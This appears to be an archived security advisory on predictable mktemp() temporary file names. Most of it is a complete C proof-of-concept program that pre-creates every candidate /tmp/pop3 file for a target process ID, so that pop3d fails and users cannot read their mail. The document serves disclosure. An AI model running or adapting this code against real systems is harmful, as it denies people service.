COMMAND

    mktemp()

SYSTEMS AFFECTED

    Any with predictable mktemp() return values

PROBLEM

    Many operating  systems have  an extremely  limited temporary file
    creation algorithm, which results in denial of service attacks  on
    any program that uses them exceedingly easy.  Dave (davem@cmu.edu)
    made a following program that could lead to denial of service.

deny-mktemp.c:
    /* This   programs opens   the complete   set of   temporary files
    tested with mktemp()  for a given  template (with 6  X's), usually
    resulting in  the program  terminating upon  failure   to find  an
    open  file.     In  pop3d  (see  in.pop3d  vulnerability  in Linux
    section, this prevents a pop client from reading their mail.

        Dave M. (davem@cmu.edu)
    */

    #include <unistd.h>
    #include <stdio.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    /* template found in program's header file, minus X's */
    #define TEMPLATE "/tmp/pop3"

    main(int argc, char **argv)
    {
     long int i,j;
     char fname[20];

     if(argc<2)
       {
         printf("Syntax: %s process-id\n");
         return -1;
       }

      j = strlen(TEMPLATE);

      strcpy(fname,TEMPLATE);
      for(i=strlen(argv[1]);i<6;i++)
        strcat(fname,"0");
      strcat(fname,argv[1]);

     for(i=0;i<26;i++)
       {
         fname[j] = 'a' + i;
         creat(fname,O_WRONLY | O_CREAT);
       }

     for(i=0;i<26;i++)
       {
         fname[j] = 'A' + i;
         creat(fname,O_WRONLY | O_CREAT);
       }

     for(i=0;i<9;i++)
       {
         fname[j] = '0' + i;
         creat(fname,O_WRONLY | O_CREAT);
       }

    }

SOLUTION

    Don't use mktemp()